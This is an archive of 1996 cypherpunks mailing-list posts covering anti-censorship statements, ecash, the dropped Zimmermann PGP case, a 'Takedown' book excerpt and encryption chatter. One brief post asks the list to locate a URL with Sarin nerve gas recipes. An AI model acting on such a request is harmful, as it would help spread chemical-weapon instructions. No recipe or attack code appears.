services based on the content of the web pages their customers may
implement using Community ConneXion services.

On Wednesday, January 10th, the Simon Wiesenthal Center issued a
request to Internet providers and universities to refuse to carry
messages that "promote racism, anti-Semitism, mayhem and violence."
Their target in the request was not Usenet, the discussion forums on
the Internet which were recently targeted for censorship by
CompuServe, but the World-Wide-Web, the area of the Internet which
allows anyone to serve their words and ideas to the nearly thirty
million people on the Internet.

Efforts are growing to regulate content on the Internet and restrict
freedom of expression. Community ConneXion is opposed to all forms of
censorship. In the letter to the Simon Wiesenthal Center, Sameer
Parekh, President of Community ConneXion, described their position in
reply to the Center's request that Internet providers pledge to
restrict service, "Community ConneXion considers it our civic duty to
provide Internet access, services, and privacy to any individual or
group, no matter what their political or social agenda."

The Simon Wiesenthal Center is asking Internet providers to restrict
access to individuals and groups who would use their services to
promote hateful ideas. "The answer to hateful speech is more speech,"
said Parekh, "Rather than attempting to ban hateful speech, which does
nothing to prevent the hate and the effects of hate in the long run,
human rights groups should devote their time and energies towards
positive activities, such as speaking out debunking the hate groups
and holocaust revisionists. Only by speaking out against the
hate-mongers can any progress be made. Trying to stop them from
speaking will only serve to encourage them."

The very same services that Community ConneXion refuses to censor may
be used by the persecuted groups who are harassed by the anti-Semites
and neo-Nazis to aid them to protect themselves from
persecution. "Using our services someone who may be afraid of the
neo-Nazis, perhaps because they live in a very intolerant town, may
set up web pages speaking out against the anti-Semites, but not reveal
their real name or address. In this way people can provide information
and speak out against the hate without fearing any repercussions. The
very same services which can help drive out hate are the very same
ones which the Simon Wiesenthal Center is asking Internet providers to
restrict."

Community ConneXion, founded in June of 1994, is the leading provider
of privacy on the Internet. They provide anonymous and pseudonymous
Internet access and web pages in addition to powerful web service,
virtual hosts, and web design consultation. Information is available
from their web pages at http://www.c2.org/.

Attachment: Open letter to the Simon Wiesenthal Center
------------------------------------------------------------------------
			 Community ConneXion
			   3038A Mabel St.
			  Berkeley, CA 94702
			     510-601-9777
			  http://www.c2.org/

January 11, 1996
The Simon Wiesenthal Center
9760 West Pico Boulevard
Los Angeles, California 90035

To Whom it May Concern:
	This letter is in response to your call for Internet providers
to refuse to carry messages which "promote racism, anti-Semitism,
mayhem and violence." Community ConneXion, The Internet Privacy
Provider, explicitly refuses to take such action as requested by your
organization. I will, in this letter, explain the rationale behind our
decision.
	While the reasons to not censor Internet traffic are great, we
will only describe a few of them in order to explain our
decision. First, the best way to fight speech is with more
speech. Second, it violates the fundamentals upon this country was
founded, in particular the ideal of freedom of expression. Finally, we
believe that trying to restrict harmful speech, which, for example,
"conspires against democracy," does more damage to the cause of
democracy than allowing the hateful individuals and organizations to
speak in the first place.
	In order to fight the hateful speech to which your
organization objects, it is more productive to speak out against the
hate and the lies of the anti-Semites and neo-Nazis than to try to
prevent them from speaking. By preventing them from speaking, you are
giving them more allies, and more legitimacy than they would have if
you merely spoke out against them and debunked their words. If you
actually take proactive action towards debunking their lies, people
will understand that they are actually lying. By preventing them from
speaking, you are promoting the idea that they actually might have
something valuable to say.  Hateful action, of course, should be
prosecuted to the fullest extent permissible by law.
	Second, this country was founded on the ideal of freedom of
expression. The First Amendment to the United States Constitution is
the first one on the list of the Bill of Rights. Restricting access to
freedom of expression to only people with acceptable viewpoints is not
true freedom of expression.
	Finally, and most important, restricting speech in order to
ostensibly protect democracy does more to damage democracy than to
help it. Censorship leads towards a more restrictive society, one
which grows ever more similar to the totalitarian government of the
Third Reich, which made the atrocities of the Holocaust possible. In
order to prevent such an atrocity from happening again, no government
must be allowed to gain the power over its citizens that was allowed
the Third Reich. By asking for restrictions on speech you are asking
for a return to the controls which gave the Third Reich its power.
	Therefore, we have taken a stance directly opposed to any and
all forms of censorship.  Community ConneXion considers it our civic
duty to provide Internet access, services, and privacy to any
individual or group, no matter what their political or social
agenda. Thank you.

Sincerely,

Sameer Parekh
President, Community ConneXion






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 11 Jan 96 04:31:33 PST
To: David Murray <davidm@iconz.co.nz>
Subject: Re: Some questions about ecash[tm]
In-Reply-To: <199601110932.WAA09988@iconz.co.nz>
Message-ID: <Pine.BSD.3.91.960111015125.25333B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Dave, 
 
 
  The following may be of some help: 
 
    DigiCash bv was founded by Dr. David Chaum, a digital cash 
    and electronic security expert.  DigiCash announced the first 
    software-only product, called Ecash, that allows the transfer 
    of digital cash over the Internet.  CURRENTLY, DigiCash tech- 
    nology is being used in electronic wallets and smart cards; 
    but IN THE LONG-TERM, the technology will be used for MANY 
    MORE applications. 
 
                              ... 
 
    Company Information:            Kruislaan 419 
                                    1098 VA Amsterdam 
                                    The Netherlands 
                                    Phone: 31 20 665 2611 
                                    Fax: 31 20 668 5486 
                                    http://www.digicash.com 
                                    E-mail: info@digicash.nl 
 
                              ... 
 
    Security                        RSA Data Security public key 
                                    cryptography, including en- 
                                    cryption, authentication, and 
                                    digital signatures, as well as 
                                    PROPRIETARY blind signature 
                                    technology. 
 
    Unique Attributes               Blind signature technology 
                                    ensures anonymous transactions. 
 
 
  The above is excerpted from Lisa Morgan's chapter, "Internet Com- 
  merce," in: 
 
                     Frederick Cooper et al 
 
                     Implementing Internet Security 
 
                     New Riders Publishing 
 
                     1995 
 
 
  Capitalization is mine. 
 
 
  Cordially, 
 
  Jim 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 11 Jan 96 03:40:23 PST
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199601111137.GAA14805@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMPT2hioZzwIn1bdtAQEE3wF8CffiCrBxUj8QpoRZ/Zw8uXyKNMRhYzVy
y8xlsMYMfkzEskgvYV4Wo+7yz9PNXyDT
=6s9S
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Thu, 11 Jan 96 05:24:21 PST
To: cypherpunks@toad.com
Subject: Re: NSA says strong crypto to china??
Message-ID: <199601111321.IAA15089@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> you think that's a bit ridiculous?  i'm paid via an NIH grant given to my
> adivisor by the govt.  this stipend is taxed.  it didn't used to be
> (started to be taxed around '86  i believe).  why the hell doesn't the
> govt just save everyone the trouble and pay me less.  i'm sure they could
> get rid of a couple of IRS people this way.

It's even sillier over here in Europe, and the paperwork is probably
a couple of order of magnitudes more expensive (due to the translations
required).  Quick example (but old figures) - the EU spends $10 million
a year to campaign against smoking, and then spends $1200 million a year
to subsidise tobacco production.

Thought for the day - Think about what the 'S' in IRS stands for.

Gary
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMPUO4yoZzwIn1bdtAQGTEQGAuuoLP0gviZeGIuy7o4oc3jqanUYKp5eT
Ce4FxXNfmz3DGZ6FY1UPGIEYZL6a7XzY
=/sBS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 11 Jan 96 06:00:48 PST
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199601111358.IAA15210@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMPUXcCoZzwIn1bdtAQGs0QF+IETWZ95anHmhOLoBJWLKvMbYU7evstfO
7+GuBtNMUJPNN/60DF2c9d/cjV3JnFhz
=stz/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 11 Jan 96 11:11:10 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: When they came for the Jews...
In-Reply-To: <2.2.32.19960110153325.006b5980@panix.com>
Message-ID: <Pine.3.89.9601111125.A14193-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 10 Jan 1996, Duncan Frissell wrote:

> He cited the posting of instructions for making explosive devices, including
> recipes for Sarin nerve gas and bombs similar to the one that destroyed the
> Federal Building in Oklahoma City last April 19.

Sarin nerve gas? Can anyone find that URL?

TIA,





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 11 Jan 96 12:38:49 PST
To: John Gilmore <gnu@toad.com>
Subject: Re: BIG NEWS: PRZ investigation dropped!
In-Reply-To: <9601112011.AA25213@toad.com>
Message-ID: <Pine.LNX.3.91.960111133332.1141I-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 11 Jan 1996, John Gilmore wrote:

> Date: Thu, 11 Jan 1996 12:11:32 -0800
> From: John Gilmore <gnu@toad.com>
> To: cypherpunks@toad.com
> Subject: BIG NEWS: PRZ investigation dropped!
> 
> From: Stanton McCandlish <mech@eff.org>
> Date: Thu, 11 Jan 1996 11:53:46 -0800 (PST)
> 
> Justice Dept. dropped investigation of Phil Zimmermann, declines to 
> prosecute.
> They put out a press rel. about it, already got a journo call regarding this.
> More when I find it.

what i'd really like to hear/see is something from the prosecutor or 
grand jury in this case.  i'd like to know what they really thought was 
going to come of this, how much of the investigation was pushed by TLA 
types, and exactly what made them think they actually had a case in the 
first place.

i would hope that after persecuting this man for years they would offer 
some reasonable explanations about their (real) motivations and why they 
decided to drop the case.

- -pjf

- --
patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.3.56 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMPV1FE3Qo/lG0AH5AQGRewQAgphy7tN+eG+XV+Wthr3U8+m24KfogKr3
G4amKgBITIn6gdk6teOzR3nGsauUytfg6k3LA+jdBTnyVQX9Ol30HNcnqKc+poAP
lvSjokMX/a/FWkxuFkUkMDc3dBDCzx732L107uDlJaXeUjwIxhWWyKJPUqGjDi4V
O1X3jV0DC5A=
=ywnX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 11 Jan 96 13:48:22 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Net Control is Thought Control
In-Reply-To: <Pine.BSD.3.91.960110172255.21390A-100000@ahcbsd1.ovnet.com>
Message-ID: <199601112147.NAA21851@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I had a request for more info on the book "Coercive Persuasion".

written by Edgar H. Schein. "a socio-psychological analysis of
the 'brainwashing' of American civilian prisoners by the Chinese
Communists". c 1961 WW Norton & CO, Inc

this book was written in 1961 when the word "brainwashing" had
just been invented. the American prisoners came back from China
saying that they believed in communism and that they knew they
were "spies" when they were not, etc.  considers the link between
social situation and beliefs and shows that the former has 
tremendous effect on people's philosophies. 

the Chinese had
pretty much perfected all the techniques of getting people to
change their beliefs without necessarily the overt methods of
totalitarian systems such as torture, suppression of free
speech etc.  in fact they tended to create systems in which
speech was encouraged, but was subtly manipulated so that it was
always used in their favor.

again, as I wrote: thought control without the subject realizing
it was thought control.

this is especially dangerous in cyberspace as I mentioned because one
now has all kinds of "virtual communities" that may not behave
in the same ways that communities now do (such as widespread use
of pseudonymity) and hence have unanticipated effects.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Thu, 11 Jan 96 05:24:41 PST
To: cypherpunks@toad.com
Subject: Crypto Law Survey - new URL and update
Message-ID: <1FE4D411F7B@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


The URL of my Crypto Law Survey has been changed several times over
the past month due to changes in servers. Apologies.

It is now located at
http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm
(and it is meant to stay there :-)).

So, please put pointers to this new URL, and accept my apologies for
the inconvenience.

To make up for this, I have updated the survey with all recent
events, such as the ICC meeting in Paris and the recent discovery of
a crypto law in Belgium, and added a few links. As always, comments
are more than welcome.

Kind regards,
Bert-Jaap

----------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law and Informatization      facs    +31 13 466 8102
Tilburg University                      e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
      http://cwis.kub.nl/~frw/schrdijk/CRI/people/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 11 Jan 96 12:31:10 PST
To: cypherpunks@toad.com
Subject: Toad Hall
Message-ID: <199601112030.PAA04786@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Chapter 2 TOAD HALL 

   In keeping with Internet nomenclature, Toad Hall acquired
   the Internet domain name toad.com, whose gateway to the
   rest of the world was a Sun SPARCstation computer in the
   building's basement. This digital domain was run by John
   and an eclectic band of programmers and hardware gurus, who
   together had a diverse political outlook, and while privacy
   was a priority, computer security at Toad was often pretty
   loose. ...

   For the past five years, Toad Hall had been Julia
   [Menapace]'s home -- for John Gilmore was the "other man,"
   with whom her relationship had been souring even before she
   and I had met. During the Christmas holidays John was away
   visiting his relatives in Florida, and so Julia and I had
   Toad Hall to ourselves when we arrived around 4 P.M. on the
   afternoon of her flight from Nepal.

   John, now forty, was someone I'd known from hacker circles,
   and even as a friend, for a number of years. ... Initially
   he hadn't minded that Julia and I spent time backpacking
   together while he worked long hours on his new start-up,
   because hiking didn't interest him. But once Julia and I
   had become more intimately involved, things grew chilly
   between him and me.

   Julia and I sent out for dinner from an Italian place
   called Bambino's. When it came, we undressed and sank into
   the indoor hot tub, eating while we soaked.

   The upstairs bathroom in Toad Hall is an unusual room. It
   is faced with a white and pink marble floor and wainscoting
   surrounding a dark green jacuzzi tub and other fixtures. A
   large asparagus fern sits on the window ledge, centered
   above the cascading waterfall of the tub's larger faucet.
   The fronds of the fern tumble down toward the water. Julia
   had, put on a cassette tape of Karma Moffet playing
   Himalayan intruments, and then lit candles; the only other
   light came from four overhead spotlights that dimly
   illuminated each corner of the tub.

   "This is just amazing," Julia murmured through the steamy
   air. She said she had fantasized continually about a long
   soak in hot water while trekking in the frigid Himalayas,
   where water is carried by hand from its source and becomes
   hot only when heated over flames, and where there is never
   enough to sit in. And at high altitude in the Solu Khumbu
   region of Nepal, the only heat had come from the sun, the
   small cooking fire, and the occasional woodstove fueled by
   wood scraps or dung.

   While we ate Julia told me stories of her adventures. In
   the kitchen of a lodge where she stayed she met and
   befriended a Sherpa guide named Tshering and a mountain
   guide from Seattle named Rachel DeSilva, who had led a
   group of 12 women to climb a 6,000-meter trekking peak in
   the region named Mara. Afterward they had invited her to
   climb another mountain named Lobuche, which lay to the
   north toward Everest. She had made it to just below the
   summit.

   I sat entranced. "I wish I had been there too," was all I
   could find to say.

   Julia had spent her birthday at the Tengboche monastery to
   celebrate the Mani Rimdu festival. She showed me a red
   string necklace that she had received when a Tibetan Lama
   had blessed her on her thirty-fifth birthday.

   "Near noon that same day, I heard the sound of long horns,
   cymbals, and drums," she recalled. "Then an avalanche
   poured in slow motion down the south face of Ama Dablam."

   Later in the trip she had stopped at one point to watch a
   sunset over Everest through the gathering mist, and she
   said it was so stark and beautiful that she cried. "I
   thought of you," she told me, "and wished you were there to
   share it with me."

   As we soaked, I told her about what had happened to me
   while she was gone. When Julia left I had been waiting for
   a $500,000 per year research grant from the National
   Security Agency, the nation's electronic intelligence-
   gathering organization. The NSA has two missions: one, its
   foreign spying mission and the other its responsibility for
   the security of all the governments computers and
   communications. In the fall an information security
   division in the agency had told me they would fund a
   project permitting me to assemble a team of experts to do
   research in new areas of computer security. I was ready to
   go and I had commitments from people to start work, but the
   agency had dragged its feet for months. Finally I had
   gotten tired of being jerked around, and two of my
   researchers had been forced to take other jobs.

   "I thought everything would be ironed out and I'd come back
   to find you happily at work with your team," she said.

   "No it wasn't," I answered. "They're amazingly inept, just
   like any government bureaucracy."

   We talked for a while about the NSA and how so many people
   in the civil liberties community fear them as Big Brother
   as well as anyone associated with them, arguing that they
   become corrupted by association. But that had never seemed
   accurate to me. Everything I'd seen indicated they were a
   largely incompetent organization tied up in endless
   regulations that could do little good or evil. And people
   are quite capable of making up their own minds.

   "I don't want to deal with them," I said.

   "I'm sorry it didn't work out, Tsutomu," she said quietly.

   We soaked for a while, both of us lost in thought. Finally
   I changed the subject.

   "I want to tell you something I've been thinking about," I
   said. "I've thought about a lot of things while you were
   away. I'd really like to try having a committed
   relationship with you, if you're willing to."

   Julia smiled. She didn't say anything, but she reached over
   and held me closely.

   It seemed like we would now be able to share a lot of time
   together. I told her I'd taken a leave of absence from the
   universlty and now I was looking forward to skiing and
   getting away. I was finally pursuing my long-held plan to
   spend a winter in the mountains, spending the mornings and
   late afternoons skiing and the mid-days and evenings
   thinking and working on my research projects.

   "Why don't you come with me and live in the mountains?" I
   suggested. "You can come ski and it will be good to be
   outside."

   We woke at about 1 P.M. the next day and Julia -- who grew
   up on the East Coast and is still learning to deal with
   mild California winters -- told me that she had seen the
   first morning light before she fell asleep and thought to
   herself, *It's Christmas and there is no sign of it here.*
   She was still jet-lagged and also feeling what she feared
   was flu coming on. We decided to spend the day inside,
   catching up on talk and sleep. It was chilly out, so Julia
   turned up Toad Hall's central heat, still eager to soak up
   the warmth of civilization after two months in the
   Himalaya.

   A bit later, while she rested, I was walking around the
   house, and several times went past the Sun SPARCstation in
   the hallway. It was a reminder that I probably had new
   electronic mail, but I didn't feel like checking it.

   At just about that moment, however, ominous bits of data
   were flowing through the Ethernet cable that wound through
   Toad's rooms and hallways. From somewhere, perhaps
   thousands of kilometers away, an electronic intruder had
   taken control of toad.com by remotely commandeering the
   SPARCstation in the basement. And while the two of us spent
   the day together two floors above, the electronic hijacker
   was using toad.com as a staging base to launch an attack on
   the computers in my own beach house some 800 kilometers
   south.
   
   -----

   From: "Takedown: The pursuit and Capture of Kevin Mitnick,
   America's Most Wanted Outlaw -- By the Man Who Did It," by
   Tsutomu Shimura, with John Markoff, Hyperion Press, a
   subsidiary of The Disney Company, 1996, 326 pp. $24.95. 
   ISBN 0-7868-6210-6

   [pp. 17-21]

   ----------

   The author appears on NBC's Dateline tomorrow, January 12.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cedric Tefft <CedricT@datastorm.com>
Date: Thu, 11 Jan 96 14:09:13 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: RE: Zimmermann case is dropped.
Message-ID: <30F5A6B0@ms-mail.datastorm.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: owner-cypherpunks
> To: cypherpunks
> Cc: prz
> Subject: Zimmermann case is dropped.
> Date: Monday, January 08, 1996 3:35AM
>
> Return-Path: <owner-cypherpunks@toad.com>
> X-Authentication-Warning: net.indra.com: uumaalox set sender to prz@maalox
>     using -f
> Message-Id: <199601081035.KAA02532@maalox>
> Subject: Zimmermann case is dropped.
> To: cypherpunks@toad.com (Cypherpunks)
> Date: Mon, 8 Jan 1996 03:35:46 -0700 (MST)
> Cc: prz@acm.org (Philip Zimmermann)
> From: Philip Zimmermann <prz@acm.org>
> Reply-To: Philip Zimmermann <prz@acm.org>
> X-Mailer: ELM [version 2.4 PL22]
> Content-Type: text
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
 ----------------------------------------------------------------------------  
 --
> -----BEGIN PGP SIGNED MESSAGE-----
>
> My lead defense lawyer, Phil Dubois, received a fax this morning from
> the Assistant US Attorney in Northern District of California, William
> Keane.  The letter informed us that I "will not be prosecuted in 
connection
> with the posting to USENET in June 1991 of the encryption program
> Pretty Good Privacy.  The investigation is closed."
>
> This brings to a close a criminal investigation that has spanned the
> last three years.  I'd like to thank all the people who helped us in
> this case, especially all the donors to my legal defense fund. 
 Apparently,
> the money was well-spent.  And I'd like to thank my very capable defense
> team:  Phil Dubois, Ken Bass, Eben Moglen, Curt Karnow, Tom Nolan, and Bob
> Corn-Revere.  Most of the time they spent on the case was pro-bono.  I'd
> also like to thank Joe Burton, counsel for the co-defendant.
>
> There are many others I can thank, but I don't have the presence of mind
> to list them all here at this moment.  The medium of email cannot express
> how I feel about this turn of events.
>
>
>   -Philip Zimmermann
>    11 Jan 96
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQCVAwUBMPDy4WV5hLjHqWbdAQEqYwQAm+o313Cm2ebAsMiPIwmd1WwnkPXEaYe9
> pGR5ja8BKSZQi4TAEQOQwQJaghI8QqZFdcctVYLm569I1/8ah0qyJ+4fOfUiAMda
> Sa2nvJR7pnr6EXrUFe1QoSauCASP/QRYcKgB5vaaOOuxyXnQfdK39AqaKy8lPYbw
> MfUiYaMREu4=
> =9CJW
> -----END PGP SIGNATURE-----
>
Chalk one up for the good guys.  Thanks for hanging in there Phil.

 - Cedric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Nobody" <mixmaster@anon.alias.net>William Bennet <x@x.x>
Date: Wed, 10 Jan 96 14:57:47 PST
To: cypherpunks@toad.com
Subject: None
In-Reply-To: <Pine.3.89.9601091009.F11357-0100000@griffin.emba.uvm.edu>
Message-ID: <199601112245.QAA00505@fuqua.fiftysix.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <wkwdZSi00YUvI3q_gr@andrew.cmu.edu> "Declan B. McCullagh" <declan+@CMU.EDU> writes:

> From: "Declan B. McCullagh" <declan+@CMU.EDU>
> Date: Tue,  9 Jan 1996 11:35:42 -0500 (EST)
> X-From-Line: owner-cypherpunks@toad.com  Tue Jan  9 11:53:19 1996
> References: <Pine.3.89.9601091009.F11357-0100000@griffin.emba.uvm.edu>
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Lines: 46
> 
> * INDECENCY is illegal to *broadcast* under Federal law, as enforced by
> the FCC. Examples of indecent words include "fuck" and "cocksucker,"
> which the Supreme Court has defined as illegal in the George Carlin
> speech, Pacifica case. The justification for a compelling government
> interest is that radio waves are pervasive, and a child can turn on the
> radio and hear dirty words by accident. The great free speech attorney
> Harvey Silverglate has been representing Alan Ginsberg in an "indecency"
> case, since "Howl" contains "indecent" words -- I believe he managed to
> get the FCC to include an exemption for material broadcast after
> midnight.

Isn't a large part of the reason the FCC can regulate broadcasters
without violating the first ammendment the fact that there are only a
finite number of broadcast frequencies, and that TV/radio stations are
required to serve the public interest?  I don't see how the same login
can be applied to the internet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 11 Jan 96 18:38:59 PST
To: hallam@w3.org
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <9601120029.AA04608@zorch.w3.org>
Message-ID: <Pine.SOL.3.91.960111184106.19791H-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jan 1996 hallam@w3.org wrote:
> make small ones out of big ones. Thats a big plus in many peoples books.
> 

> 
> 
> >	We've made no progress. Phil has lots lots of time and gained
> >lots of grey hairs, and everyone who donated to his defense fund lost
> >money.
> 
> No progress? At least Phil is not going off on a trip to Alcatraz to
> One of the most overdue reforms of the US government is the renaming of
> the FBI building to remove the name of J Edgar Hoover. The abuse of power 
> under his administration of the FBI continues to poison the US polity
> by providing clear proof to many citizens that their government cannot be 
> trusted. While the abuses of Hoover continue to be commemerated in this
> fashion there can be little public confidence in any claims of reform.
> 
> >	The US can still harass people if they want, and make their
> >life hell.
> 
> Not just the US government. There are many crooks out there who have attempted
> or are attempting worse. At least with the government there are means to
> bring it to heel eventually.
> 
> 	Phill
> 
> 

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Thu, 11 Jan 96 19:26:31 PST
To: cypherpunks@toad.com
Subject: Re: Shimomura on TV?
Message-ID: <199601120305.TAA16534@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> From: Michael C. Peponis <mianigand@unique.outlook.net>
> To: cypherpunks@toad.com
> 
> Why let it bother you? You must understand that the majority of the 
                                                      ^^^^^^^^
> population of the United States is working class trash, the news 
                                     ^^^^^^^^^^^^^^^^^^^
                                     Hope you're including yourself in that.

> media is just peddeling to the masses, just like the morons that hold 
                ^^^^^^^^^
                Can't spell - *must* be working class trash...

> elected office.
> 
> Regards,
> Michael Peponis
          ^^^^^^^
          Tell me: is the 'po' silent?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 11 Jan 96 19:02:29 PST
Subject: Pantsing- sorry, Takedown
In-Reply-To: <199601120029.TAA28014@pipe3.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.960111184256.19791I-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


I skimmed through the book at Keplers; it seemed an interesting enough 
romp. The style is Markoff all the way, so it's well pretty well written.
They do seem to paint a pretty black and white picture of Mitnick, which 
is to be expected given the author's involvement in the investigation.

It seems like a good book for a long flight, or a slow caltrain. 

I was a little annoyed by the way the authors dissed Raleigh as a 
'backwater' though. Ok, it's not Chapel Hill, but still :-)

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@wero.cs.byu.edu>
Date: Thu, 11 Jan 96 19:30:47 PST
To: cypherpunks@toad.com
Subject: https & encrypted connections
Message-ID: <199601120211.TAA00265@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

First of all, let me apologize for not being very knowledgable about CA's
and https and SSLeay, apache, and generating renegade (ie, your own)
certificates. If someone wants to go over this [again] certainly it'd be
welcome.

I was today playing around with a Mozilla 2.0beta5 that someone gave me
[more bells and whistles than my 1.12, but not much more bang for the buck]
and was showing a friend all the nifty information that netscape tells
about you when you visit sites, then went to c2 to show off the apache
web server and when I tried to use https:// to show off how you can have your
own encrypting web server for free and everything, a window popped up and
said the certificate was expired.

I couldn't really tell if it meant that the certificate that Sameer generated
really needed to be updated, or if Netscape beta 5 had just been rigged to
reject non-netscape certificates, but the end result was no encryption.

(Jeff, if you're reading this, of course we know that Netscape, with it's open
loving policies wouldn't do anything underhanded, but the thought does come
to mind, and by the way, when are we going to see an option to turn off or
control what information is passed out to the other end. Specifically, I'd like
http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl to come up nearly blank.)

Soooo, anyway, I was wondering if anyone knows anything about the use of
privately generated certificates. Yes, Jeff, we know that Netscape is jumping
to fully support user-specified certificates, but personally I saw, relating
to certificates, a lot of *nifty* options and displays, but really didn't
see much in the way of anything that looked like "add".

...Looking forward to the day where end-to-end encryption is king, and the
TLA, my competition, or anyone else can take their packet sniffer and kiss
my butt.

Don
 
PS: my predictions on the PRZ-secretly-sold-out-rumor-index: 6.
    my predictions on the IQ of those making those claims:   6. (cumulative)
    woohooo Phil!
- -- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMPXDV8La+QKZS485AQHkXwMAnGWVeLB6ntpkK1ksZ7a8+iklA/sPfIT2
XqqJRRX0Ddg2UuAAxmk6WOC/nxnRPRlM/4AkkaEohZRv14ccnlvv3qVGFxpLlxKG
iYgbn1x9/xgHjwAB31HqozQix79wPfB/
=v9ni
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 11 Jan 96 19:18:01 PST
To: sameer <sameer@c2.org>
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601112329.PAA15617@infinity.c2.org>
Message-ID: <Pine.SOL.3.91.960111191602.19791M-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


For once, Thatcher said it best: 
	"Just Rejoice."

However, Churchill said it better: 
	"This is not the end. This is not the beginning of the,
	 but rather the end of the beginning". 

